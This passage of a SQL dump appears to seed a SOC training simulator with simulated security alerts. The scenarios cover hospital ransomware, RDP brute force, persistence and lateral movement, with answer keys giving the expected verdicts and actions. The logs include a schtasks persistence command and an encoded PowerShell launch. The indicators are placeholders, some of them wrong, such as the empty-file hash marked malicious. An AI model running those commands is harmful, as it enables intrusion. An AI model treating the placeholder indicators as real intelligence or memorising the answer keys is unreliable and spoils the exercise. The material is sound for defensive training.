campaigns.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"nhs_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate admin user account within NHS.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(924, 'Disrupting Hospital Operations - Step 5', 'critical', 'Hospital IT Incident Reports', 'Critical hospital operations, including surgeries, are canceled, triggering a healthcare crisis that underscores the attack\'s severity and the urgency of restoring systems. Advanced destructive malware attributed to the Lazarus Group has been detected within the hospital network, actively disrupting services.', 'Operational Disruption', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"event_id\":\"evt-2023-10-15-0005\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.25\",\"malware_name\":\"WannaCry\",\"malware_hash\":\"09f7e02f1290be211da707a266f153b3\",\"affected_system\":\"hospital_surgery_scheduling_system\",\"user\":\"jdoe\",\"action\":\"encryption\",\"filename\":\"critical_schedule_data.enc\",\"severity\":\"critical\",\"log_message\":\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\"}', '2026-01-15 01:03:39', '2026-02-16 17:54:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group Command & Control Server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Scan\",\"verdict\":\"internal\",\"details\":\"Hospital Surgery Scheduling System\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"09f7e02f1290be211da707a266f153b3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"WannaCry ransomware variant\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"critical_schedule_data.enc\",\"is_critical\":true,\"osint_result\":{\"source\":\"Incident 
Report\",\"verdict\":\"malicious\",\"details\":\"Encrypted hospital scheduling data\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on 
hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.610Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:00Z\\\",\\\"event_id\\\":\\\"evt-2023-10-15-0005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.25\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"malware_hash\\\":\\\"09f7e02f1290be211da707a266f153b3\\\",\\\"affected_system\\\":\\\"hospital_surgery_scheduling_system\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"encryption\\\",\\\"filename\\\":\\\"critical_schedule_data.enc\\\",\\\"severity\\\":\\\"critical\\\",\\\"log_message\\\":\\\"Detected encryption activity on hospital_surgery_scheduling_system by malware WannaCry from IP 203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(925, 'Accidental Discovery of Kill-Switch Domain', 'critical', 'Threat Intelligence Reports', 'A security researcher accidentally discovered a kill-switch domain, halting the spread of a ransomware linked to the Lazarus Group. This discovery provided a temporary reprieve in the incident response against the ransomware attack, showcasing a pivotal learning moment in handling such incidents.', 'Incident Response', 'T1489: Service Stop', 1, 'resolved', NULL, '{\"event_id\":\"5678\",\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"203.0.113.55\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"kill_switch_domain\":\"killswitch.example.com\",\"user\":\"researcher01\",\"filename\":\"ransomware_payload.exe\"}', '2026-01-15 01:03:39', '2026-02-16 17:54:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a detected ransomware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"killswitch.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"suspicious\",\"details\":\"Domain recognized as a kill-switch for specific ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"Executable known to deploy ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.611Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"5678\\\",\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.55\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"kill_switch_domain\\\":\\\"killswitch.example.com\\\",\\\"user\\\":\\\"researcher01\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(926, 'Initial Access: RDP Brute-Force Detection', 'high', 'Firewall logs', 'Unauthorized attempts to gain access to the Atlanta municipal network were detected via brute-force attacks targeting RDP services. An external IP was observed making numerous login attempts within a short time frame.', 'Initial Access', 'T1110.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:27Z\",\"event_type\":\"RDP Brute-Force Attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username_attempted\":\"administrator\",\"login_status\":\"failed\",\"attempt_count\":25,\"firewall_action\":\"blocked\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"RDPBruteForceTool.exe\"}', '2026-01-15 01:04:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with multiple brute-force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal RDP server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"clean\",\"details\":\"Commonly targeted username.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Associated with known brute-force tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"RDPBruteForceTool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Known brute-force attack 
tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(927, 'Execution: Malicious Payload Deployment', 'critical', 'Endpoint detection and response (EDR) systems', 'Following successful access, the attackers executed the ransomware to encrypt critical municipal data, escalating the attack. The ransomware payload was identified on the compromised systems, initiating encryption of sensitive files.', 'Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"execution\",\"hostname\":\"municipality-server-01\",\"username\":\"j.doe\",\"process_name\":\"ransomware.exe\",\"process_id\":2954,\"file_path\":\"C:\\\\Users\\\\j.doe\\\\Downloads\\\\ransomware.exe\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"destination_port\":445,\"action\":\"file executed\",\"detected_by\":\"EDR\",\"malware_family\":\"Snake Ransomware\"}', '2026-01-15 01:04:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with ransomware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the Snake Ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with ransomware 
activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account that initiated the execution on the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(928, 'Persistence: Establishing Foothold', 'high', 'System logs', 'An unusual persistence mechanism was detected on a critical server. Analysis of the system logs revealed suspicious activity associated with maintaining unauthorized access. A known malicious IP communicated with an internal server, and a suspicious script was set to execute on startup, indicating efforts to establish a foothold.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:22Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"malicious_user\",\"process\":\"schtasks.exe\",\"command_line\":\"schtasks /create /tn \\\"SystemUpdate\\\" /tr \\\"C:\\\\Windows\\\\System32\\\\malicious_script.ps1\\\" /sc onlogon\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_script.ps1\"}', '2026-01-15 01:04:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File used in known persistence techniques\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known 
malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account associated with unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc 
onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(929, 'Lateral Movement: Spreading the Ransomware', 'critical', 'Network traffic analysis', 'The attackers have successfully moved laterally within the network, deploying ransomware to multiple systems. This step involves using compromised credentials to access network shares and execute malicious payloads, exponentially increasing the impact and demanding higher ransom.', 'Lateral Movement', 'T1076: Remote Desktop Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:23Z\",\"source_ip\":\"192.168.1.12\",\"destination_ip\":\"10.0.0.45\",\"attacker_ip\":\"203.0.113.57\",\"username\":\"john.doe\",\"filename\":\"ransomware_payload.exe\",\"hash\":\"cf23df2207d99a74fbe169e3eba035e633b65d94\",\"protocol\":\"RDP\",\"action\":\"executed\",\"status\":\"success\"}', '2026-01-15 01:04:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Target system of lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used by attacker.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"cf23df2207d99a74fbe169e3eba035e633b65d94\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus total\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"malicious\",\"details\":\"File 
